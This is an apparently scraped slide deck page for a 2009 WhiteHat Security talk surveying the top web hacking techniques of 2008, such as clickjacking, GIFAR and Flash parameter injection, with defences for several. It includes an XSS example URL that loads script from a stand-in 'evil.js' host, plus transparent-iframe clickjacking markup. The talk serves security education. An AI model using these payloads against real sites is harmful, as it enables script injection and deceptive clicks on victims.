15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security Guarantees
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report Explained
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics Report
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]
 

Recently uploaded

Planetek Italia Srl - Corporate Profile Brochure
Planetek Italia Srl - Corporate Profile BrochurePlanetek Italia Srl - Corporate Profile Brochure
Planetek Italia Srl - Corporate Profile BrochurePlanetek Italia Srl
 
AI Workshops at Computers In Libraries 2024
AI Workshops at Computers In Libraries 2024AI Workshops at Computers In Libraries 2024
AI Workshops at Computers In Libraries 2024Brian Pichman
 
Automation Ops Series: Session 2 - Governance for UiPath projects
Automation Ops Series: Session 2 - Governance for UiPath projectsAutomation Ops Series: Session 2 - Governance for UiPath projects
Automation Ops Series: Session 2 - Governance for UiPath projectsDianaGray10
 
Trailblazer Community - Flows Workshop (Session 2)
Trailblazer Community - Flows Workshop (Session 2)Trailblazer Community - Flows Workshop (Session 2)
Trailblazer Community - Flows Workshop (Session 2)Muhammad Tiham Siddiqui
 
The Importance of Indoor Air Quality (English)
The Importance of Indoor Air Quality (English)The Importance of Indoor Air Quality (English)
The Importance of Indoor Air Quality (English)IES VE
 
Outage Analysis: March 5th/6th 2024 Meta, Comcast, and LinkedIn
Outage Analysis: March 5th/6th 2024 Meta, Comcast, and LinkedInOutage Analysis: March 5th/6th 2024 Meta, Comcast, and LinkedIn
Outage Analysis: March 5th/6th 2024 Meta, Comcast, and LinkedInThousandEyes
 
Where developers are challenged, what developers want and where DevEx is going
Where developers are challenged, what developers want and where DevEx is goingWhere developers are challenged, what developers want and where DevEx is going
Where developers are challenged, what developers want and where DevEx is goingFrancesco Corti
 
UiPath Studio Web workshop series - Day 1
UiPath Studio Web workshop series  - Day 1UiPath Studio Web workshop series  - Day 1
UiPath Studio Web workshop series - Day 1DianaGray10
 
Extra-120324-Visite-Entreprise-icare.pdf
Extra-120324-Visite-Entreprise-icare.pdfExtra-120324-Visite-Entreprise-icare.pdf
Extra-120324-Visite-Entreprise-icare.pdfInfopole1
 
Introduction - IPLOOK NETWORKS CO., LTD.
Introduction - IPLOOK NETWORKS CO., LTD.Introduction - IPLOOK NETWORKS CO., LTD.
Introduction - IPLOOK NETWORKS CO., LTD.IPLOOK Networks
 
UiPath Studio Web workshop Series - Day 3
UiPath Studio Web workshop Series - Day 3UiPath Studio Web workshop Series - Day 3
UiPath Studio Web workshop Series - Day 3DianaGray10
 
Introduction to RAG (Retrieval Augmented Generation) and its application
Introduction to RAG (Retrieval Augmented Generation) and its applicationIntroduction to RAG (Retrieval Augmented Generation) and its application
Introduction to RAG (Retrieval Augmented Generation) and its applicationKnoldus Inc.
 
GraphSummit Copenhagen 2024 - Neo4j Vision and Roadmap.pptx
GraphSummit Copenhagen 2024 - Neo4j Vision and Roadmap.pptxGraphSummit Copenhagen 2024 - Neo4j Vision and Roadmap.pptx
GraphSummit Copenhagen 2024 - Neo4j Vision and Roadmap.pptxNeo4j
 
UiPath Studio Web workshop series - Day 4
UiPath Studio Web workshop series - Day 4UiPath Studio Web workshop series - Day 4
UiPath Studio Web workshop series - Day 4DianaGray10
 
Webinar: The Art of Prioritizing Your Product Roadmap by AWS Sr PM - Tech
Webinar: The Art of Prioritizing Your Product Roadmap by AWS Sr PM - TechWebinar: The Art of Prioritizing Your Product Roadmap by AWS Sr PM - Tech
Webinar: The Art of Prioritizing Your Product Roadmap by AWS Sr PM - TechProduct School
 
IT Service Management (ITSM) Best Practices for Advanced Computing
IT Service Management (ITSM) Best Practices for Advanced ComputingIT Service Management (ITSM) Best Practices for Advanced Computing
IT Service Management (ITSM) Best Practices for Advanced ComputingMAGNIntelligence
 
2024.03.12 Cost drivers of cultivated meat production.pdf
2024.03.12 Cost drivers of cultivated meat production.pdf2024.03.12 Cost drivers of cultivated meat production.pdf
2024.03.12 Cost drivers of cultivated meat production.pdfThe Good Food Institute
 
Flow Control | Block Size | ST Min | First Frame
Flow Control | Block Size | ST Min | First FrameFlow Control | Block Size | ST Min | First Frame
Flow Control | Block Size | ST Min | First FrameKapil Thakar
 
TrustArc Webinar - How to Live in a Post Third-Party Cookie World
TrustArc Webinar - How to Live in a Post Third-Party Cookie WorldTrustArc Webinar - How to Live in a Post Third-Party Cookie World
TrustArc Webinar - How to Live in a Post Third-Party Cookie WorldTrustArc
 
EMEA What is ThousandEyes? Webinar
EMEA What is ThousandEyes? WebinarEMEA What is ThousandEyes? Webinar
EMEA What is ThousandEyes? WebinarThousandEyes
 

Recently uploaded (20)

Planetek Italia Srl - Corporate Profile Brochure
Planetek Italia Srl - Corporate Profile BrochurePlanetek Italia Srl - Corporate Profile Brochure
Planetek Italia Srl - Corporate Profile Brochure
 
AI Workshops at Computers In Libraries 2024
AI Workshops at Computers In Libraries 2024AI Workshops at Computers In Libraries 2024
AI Workshops at Computers In Libraries 2024
 
Automation Ops Series: Session 2 - Governance for UiPath projects
Automation Ops Series: Session 2 - Governance for UiPath projectsAutomation Ops Series: Session 2 - Governance for UiPath projects
Automation Ops Series: Session 2 - Governance for UiPath projects
 
Trailblazer Community - Flows Workshop (Session 2)
Trailblazer Community - Flows Workshop (Session 2)Trailblazer Community - Flows Workshop (Session 2)
Trailblazer Community - Flows Workshop (Session 2)
 
The Importance of Indoor Air Quality (English)
The Importance of Indoor Air Quality (English)The Importance of Indoor Air Quality (English)
The Importance of Indoor Air Quality (English)
 
Outage Analysis: March 5th/6th 2024 Meta, Comcast, and LinkedIn
Outage Analysis: March 5th/6th 2024 Meta, Comcast, and LinkedInOutage Analysis: March 5th/6th 2024 Meta, Comcast, and LinkedIn
Outage Analysis: March 5th/6th 2024 Meta, Comcast, and LinkedIn
 
Where developers are challenged, what developers want and where DevEx is going
Where developers are challenged, what developers want and where DevEx is goingWhere developers are challenged, what developers want and where DevEx is going
Where developers are challenged, what developers want and where DevEx is going
 
UiPath Studio Web workshop series - Day 1
UiPath Studio Web workshop series  - Day 1UiPath Studio Web workshop series  - Day 1
UiPath Studio Web workshop series - Day 1
 
Extra-120324-Visite-Entreprise-icare.pdf
Extra-120324-Visite-Entreprise-icare.pdfExtra-120324-Visite-Entreprise-icare.pdf
Extra-120324-Visite-Entreprise-icare.pdf
 
Introduction - IPLOOK NETWORKS CO., LTD.
Introduction - IPLOOK NETWORKS CO., LTD.Introduction - IPLOOK NETWORKS CO., LTD.
Introduction - IPLOOK NETWORKS CO., LTD.
 
UiPath Studio Web workshop Series - Day 3
UiPath Studio Web workshop Series - Day 3UiPath Studio Web workshop Series - Day 3
UiPath Studio Web workshop Series - Day 3
 
Introduction to RAG (Retrieval Augmented Generation) and its application
Introduction to RAG (Retrieval Augmented Generation) and its applicationIntroduction to RAG (Retrieval Augmented Generation) and its application
Introduction to RAG (Retrieval Augmented Generation) and its application
 
GraphSummit Copenhagen 2024 - Neo4j Vision and Roadmap.pptx
GraphSummit Copenhagen 2024 - Neo4j Vision and Roadmap.pptxGraphSummit Copenhagen 2024 - Neo4j Vision and Roadmap.pptx
GraphSummit Copenhagen 2024 - Neo4j Vision and Roadmap.pptx
 
UiPath Studio Web workshop series - Day 4
UiPath Studio Web workshop series - Day 4UiPath Studio Web workshop series - Day 4
UiPath Studio Web workshop series - Day 4
 
Webinar: The Art of Prioritizing Your Product Roadmap by AWS Sr PM - Tech
Webinar: The Art of Prioritizing Your Product Roadmap by AWS Sr PM - TechWebinar: The Art of Prioritizing Your Product Roadmap by AWS Sr PM - Tech
Webinar: The Art of Prioritizing Your Product Roadmap by AWS Sr PM - Tech
 
IT Service Management (ITSM) Best Practices for Advanced Computing
IT Service Management (ITSM) Best Practices for Advanced ComputingIT Service Management (ITSM) Best Practices for Advanced Computing
IT Service Management (ITSM) Best Practices for Advanced Computing
 
2024.03.12 Cost drivers of cultivated meat production.pdf
2024.03.12 Cost drivers of cultivated meat production.pdf2024.03.12 Cost drivers of cultivated meat production.pdf
2024.03.12 Cost drivers of cultivated meat production.pdf
 
Flow Control | Block Size | ST Min | First Frame
Flow Control | Block Size | ST Min | First FrameFlow Control | Block Size | ST Min | First Frame
Flow Control | Block Size | ST Min | First Frame
 
TrustArc Webinar - How to Live in a Post Third-Party Cookie World
TrustArc Webinar - How to Live in a Post Third-Party Cookie WorldTrustArc Webinar - How to Live in a Post Third-Party Cookie World
TrustArc Webinar - How to Live in a Post Third-Party Cookie World
 
EMEA What is ThousandEyes? Webinar
EMEA What is ThousandEyes? WebinarEMEA What is ThousandEyes? Webinar
EMEA What is ThousandEyes? Webinar
 

Top Ten Web Hacking Techniques – 2008

  • 1. Top Ten Web Hacking Techniques – 2008 Jeremiah Grossman Founder & Chief Technology Officer WhiteHat Security
  • 2.
  • 3.
  • 4. © 2009 WhiteHat, Inc. | Page MUST be able to protect against HOSTILE WEB PAGE MUST be able to protect against HOSTILE WEB USER
  • 5. © 2009 WhiteHat, Inc. | Page 2008’s New Web Hacking Techniques 83 (2007) 70 (2008) 65 (2006) http://jeremiahgrossman.blogspot.com/2009/02/top-ten-web-hacking-techniques-of-2008.html
  • 6. © 2009 WhiteHat, Inc. | Page CUPS Detection CSRFing the uTorrent plugin Clickjacking / Videojacking Bypassing URL AuthC and AuthZ with HTTP Verb Tampering I used to know what you watched, on YouTube Safari Carpet Bomb Flash clipboard Hijack Flash Internet Explorer security model bug Frame Injection Fun Free MacWorld Platinum Pass? Yes in 2008!Diminutive Worm, 161 byte Web Worm SNMP XSS Attack Res Timing File Enumeration Without JavaScript in IE7.0Stealing Basic Auth with Persistent XSS Smuggling SMTP through open HTTP proxies Collecting Lots of Free 'Micro-Deposits’ Using your browser URL history to estimate gender Cross-site File Upload Attacks Same Origin Bypassing Using Image Dimensions HTTP Proxies Bypass Firewalls Join a Religion Via CSRF Cross-domain leaks of site logins via Authenticated CSS JavaScript Global Namespace Pollution GIFARHTML/CSS Injections - Primitive Malicious Code Hacking Intranets Through Web Interfaces Cookie Path Traversal Racing to downgrade users to cookie-less authentication MySQL and SQL Column Truncation Vulnerabilities Building Subversive File Sharing With Client Side Applications Firefox XML injection into parse of remote XML Firefox cross-domain information theft (simple text strings, some CSV) Firefox 2 and Web Kit nightly cross-domain image theft Browser's Ghost Busters Exploiting XSS vulnerabilities on cookies Breaking Google Gears' Cross-Origin Communication Model Flash Parameter Injection Cross Environment Hopping Exploiting Logged Out XSS Vulnerabilities Exploiting CSRF Protected XSSActiveX Repurposing Tunneling tcp over http over sql-injection Arbitrary TCP over uploaded pages Local DoS on CUPS to a remote exploit via specially-crafted webpage JavaScript Code Flow Manipulation Common localhost dns misconfiguration can lead to &quot;same site&quot; scripting Pulling system32 out over blind SQL Injection Dialog Spoofing - Firefox Basic Authentication Skype cross-zone scripting vulnerability Safari pwns Internet Explorer IE &quot;Print Table of Links&quot; Cross-Zone Scripting Vulnerability A different Opera Abusing HTML 5 Structured Client-side Storage SSID Script Injection DHCP Script Injection File Download Injection Navigation Hijacking (Frame/Tab Injection Attacks) UPnP Hacking via Flash Total surveillance made easy with VoIP phone Social Networks Evil Twin Attacks Recursive File Include DoS Multi-pass filters bypass Session Extending Code Execution via XSS Redirector’s hell Persistent SQL Injection JSON Hijacking with UTF-7SQL Smuggling Abusing PHP Sockets CSRF on Novell GroupWise WebAccess
  • 7. © 2009 WhiteHat, Inc. | Page 10 http://blog.watchfire.com/wfblog/2008/10/flash-parameter.html http://blog.watchfire.com/FPI.pdf By: Yuval Baror, Ayal Yogev, and Adi Sharabani Flash Parameter Injection introduces a new way to inject values to global parameters in Flash movies while the movie is embedded in it's original HTML environment. These injected parameters can grant the attacker full control over the page DOM, as well as control over other objects within the Flash movie. This can lead to more elaborate attacks that take advantage of the interaction between the Flash movie and the HTML page in which it is embedded. Flash Parameter Injection
  • 8.
  • 9. © 2009 WhiteHat, Inc. | Page Passing arguments in an embedded URI Passing arguments using 'flashvars' DOM-based Flash parameter injection
  • 10. © 2009 WhiteHat, Inc. | Page Persistent Flash Parameter Injection
  • 11.
  • 12. © 2009 WhiteHat, Inc. | Page 9 http://carnal0wnage.blogspot.com/2008/08/owning-client-without-and-exploit.html http://www.sensepost.com/blog/2237.html http://www.networkworld.com/news/2008/0 80708-black-hat-ssl-vpn-security.html By: Haroon Meer Multi-staged attack to get code execution on victims who were running a vulnerable and popular SSL-VPN ActiveX control. ActiveX Repurposing
  • 13. How it works © 2009 WhiteHat, Inc. | Page
  • 14.
  • 15.
  • 16. Tunneling TCP over HTTP over SQL-Injection © 2009 WhiteHat, Inc. | Page 8 http://www.sensepost.com/research/reDuh/SensePost_2008.tgz By: Glenn Willinson, Marco Slaviero and Haroon Meer Create a TCP circuit through reDuh over squeeza by building the server component within SQL Servers CLR subsystem.
  • 17. © 2009 WhiteHat, Inc. | Page
  • 18. © 2009 WhiteHat, Inc. | Page
  • 19.
  • 20. Cross-domain leaks of site logins via Authenticated CSS © 2009 WhiteHat, Inc. | Page 7 http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html By: Chris Evans and Michal Zalewski Checks the contents of a style sheet property value across domains. The most reliable technique to determine whether the victim is logged-in to a given website or not.
  • 21.
  • 22. Defenses © 2009 WhiteHat, Inc. | Page As a Web application, do not store anything sensitive (such as user-identifying customizations) in stylesheet properties. If you must, make sure to store the properties in their own CSS file and ensure the URL of that file unguessable to attackers for a given victim user.
  • 23. Abusing HTML 5 Structured Client-side Storage © 2009 WhiteHat, Inc. | Page 6 http://trivero.secdiscover.com/html5whitepaper.pdf By: Alberto Trivero HTML5 has introduced three new powerful ways to save big amount of data on the client's PC through the browser. Attackers could steal or modify sensitive data online or offline. If a web application which uses this kind of client-side storage is vulnerable to XSS (Cross- site scripting) attacks we can use an attack payload to read or modify the content of known storage keys (session storage, global storage, local storage or database storage) on the computer’s victim. If the web application loads data or code from the local storage, could be also quite powerful to inject malicious code that will be executed every time the web application will request it.
  • 24.
  • 25.
  • 26.
  • 27. © 2009 WhiteHat, Inc. | Page http://example.com/page.php?name= <script src= http://foo.com/evil.js ></script>
  • 28. Defenses © 2009 WhiteHat, Inc. | Page Website : Avoid saving sensitive data on the users machine and clear the client-side storage whenever possible. Web Browser : Web users should check regularly the content of the HTML5 client-side storage saved by their browser (delete?). LSO Storage Locations : Windows XP $userpplication Dataacromedialash PlayerSharedObjects Windows Vista $userppDataoamingacromedialash PlayerSharedObjects Mac OS X ~/Library/Preferences/Macromedia/Flash Player/#SharedObjects Linux /home/$user/.macromedia/Flash_Player/#SharedObjects
  • 29. A Different Opera © 2009 WhiteHat, Inc. | Page 5 http://www.wisec.it/sectou.php?id=49102ef18b7f3 http://aviv.raffon.net/2008/10/30/ADifferentOpe ra.aspx http://seclists.org/fulldisclosure/2008/Oct/04 01.html By: Stefano Di Paola Exploit an XSS in Opera:feature scheme leading to code execution by abusing same origin policy.
  • 30.
  • 31.
  • 32. Clickjacking / Videojacking © 2009 WhiteHat, Inc. | Page 4 http://www.sectheory.com/clickjacking.htm http://jeremiahgrossman.blogspot.com/2008 /10/clickjacking-web-pages-can-see-and-hear.html http://blogs.adobe.com/psirt/2008/10/cli ckjacking_security_advisory.html By: Jeremiah Grossman and Robert Hansen Think of any button – image, link, form, etc. – on any website – that can appear between the Web browser walls. This includes wire transfer on banks, DSL router buttons, Digg buttons, CPC advertising banners, Netflix queue.  Next consider that an attacker can invisibly hover these buttons below the user's mouse, so that when a user clicks on something they visually see, they're actually clicking on something the attacker wants them to.
  • 33. © 2009 WhiteHat, Inc. | Page
  • 34. Hover Invisible IFRAMEs © 2009 WhiteHat, Inc. | Page <iframe src=&quot; http://victim/page.html &quot; scrolling=&quot;no&quot;frameborder=&quot;0&quot; style=&quot;opacity:.1;filter: alpha(opacity=.1); -moz-opacity:1.0;&quot;> </iframe> HTML, CSS, and JavaScript may size, follow the mouse and make transparent third-party IFRAME content.
  • 35. © 2009 WhiteHat, Inc. | Page HTML, CSS, and JavaScript may size, follow the mouse and make transparent third-party IFRAME content.
  • 36. What if a Web page could See and Hear you? © 2009 WhiteHat, Inc. | Page Clickjacking enables corporate espionage, government surveillance, home user spying, etc. Every computer with a webcam and/or a microphone becomes a remote monitoring device. JavaScript can’t access the webcam or microphone...
  • 37. © 2009 WhiteHat, Inc. | Page <div style=&quot; opacity:.1;filter: alpha(opacity=.1); -moz-opacity:.9 &quot;><embed src=&quot;vid.swf&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;false&quot; wmode=&quot;transparent&quot; ></embed></div>
  • 38.
  • 39. Safari Carpet Bomb © 2009 WhiteHat, Inc. | Page http://www.dhanjani.com/blog/2008/05/safari-carpet-b.html http://www.oreillynet.com/onlamp/blog/2008/05/safari_carp et_bomb.html http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExpl orer.aspx By: Nitesh Dhanjani The Safari Carpet Bomb attack allows a malicious website controlled by an attacker to litter the user's desktop on windows or the user's “Downloads” directory on OSX with arbitrary files and malware. This vulnerability has the distinction of bringing the term &quot;blended threat&quot; into the security vernacular because, if you are able to litter user's machines with arbitrary files, you can further the impact and affect other applications that trust content on the local filesystem. 3
  • 40.
  • 41. © 2009 WhiteHat, Inc. | Page
  • 42.
  • 43. Breaking Google Gears' Cross-Origin Communication Model © 2009 WhiteHat, Inc. | Page 2 http://blog.watchfire.com/wfblog/2008/12/breaking-google-gears-cross-origin-communication-model.html By: Yair Amit Under some circumstances the cross-origin communication security model of Google Gears could be bypassed. An attacker could gain access to sensitive resources of the victim in other websites (even those that does not use Google Gears) - mainly ones that contain users' content (forums, web-mails, social networks, office-like services, etc.).
  • 44.
  • 45.
  • 46. Defenses © 2009 WhiteHat, Inc. | Page Update Google Gears. (Content-Type header value (application/x-gears-worker) Web developers who rely on Google Gears should be aware that the fix might require some changes, such as creating a special rule in the Web server for serving Google-Gears worker code files.
  • 47. Top Ten Web Hacking Techniques (008) © 2009 WhiteHat, Inc. | Page
  • 48. GIFAR © 2009 WhiteHat, Inc. | Page 1 http://riosec.com/how-to-create-a-gifar http://xs-sniper.com/blog/2008/12/17/su n-fixes-gifars/ http://blogs.zdnet.com/security/?p=161 9 By: Billy Rios, Nathan McFeters, Rob Carter, and John Heasman A content ownership issue taking advantage of flimsy security controls on both the server side and the client side.  What's new is appending a Java Applet (in the form of a JAR) at the end of another file that would be commonly allowed in file uploads on web applications, such as images, word documents, audio/video files, just about anything.  
  • 49. How it works © 2009 WhiteHat, Inc. | Page JAR GIF
  • 50. Defenses © 2009 WhiteHat, Inc. | Page Website: Do not accept file uploads Host uploaded content on throw away domains or IP addresses Convert all content Web Browser: a) Disable third-party browser extensions b) Install the latest JVM and remove older versions
  • 51. Thank You Jeremiah Grossman Blog: http://jeremiahgrossman.blogspot.com/ Twitter: http://twitter.com/jeremiahg Email: jeremiah@whitehatsec.com WhiteHat Security http://www.whitehatsec.com/